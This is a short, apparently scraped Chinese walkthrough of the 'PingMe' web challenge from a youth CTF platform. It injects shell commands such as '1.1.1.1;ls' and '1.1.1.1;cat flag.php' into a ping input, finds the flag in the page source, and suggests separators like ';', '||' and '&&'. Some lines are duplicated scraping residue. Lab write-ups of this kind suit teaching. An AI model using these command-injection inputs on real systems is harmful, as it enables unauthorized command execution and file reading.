青少年CTF-Web-Easy PingMe攻略
发布时间
阅读量:
阅读量
题目平台:青少年ctf
解题工具:浏览器
前言:根据题目意思得知该题目为命令执行【命令注入】
题目图片:

第一步:启动靶场,然后打开链接查看原型

1.1.1.1;ls
1.1.1.1;ls
1.1.1.1;ls

;
;
flag.php
1.1.1.1;cat flag.php
示例输出
;
1.1.1;cat flag.php #一定要注意是英文的分号
代码解读
第三步:提交测试

CTRL+U
CTRL+U
CTRL+U
Ctrl+U
CTRL+U
代码解读
第四步:查看源代码

果然得到了结果哈哈哈, 那么为什么不直接显示出来呢?因为它是PHP语言, 并且将flag赋值到了变量中, 也没有进行输出!
end:遇到命令注入的可以尝试【; || &&】等符号测试
end:遇到命令注入的可以尝试【; || &&】等符号测试
代码解读
本文仅供学习
全部评论 (0)
还没有任何评论哟~
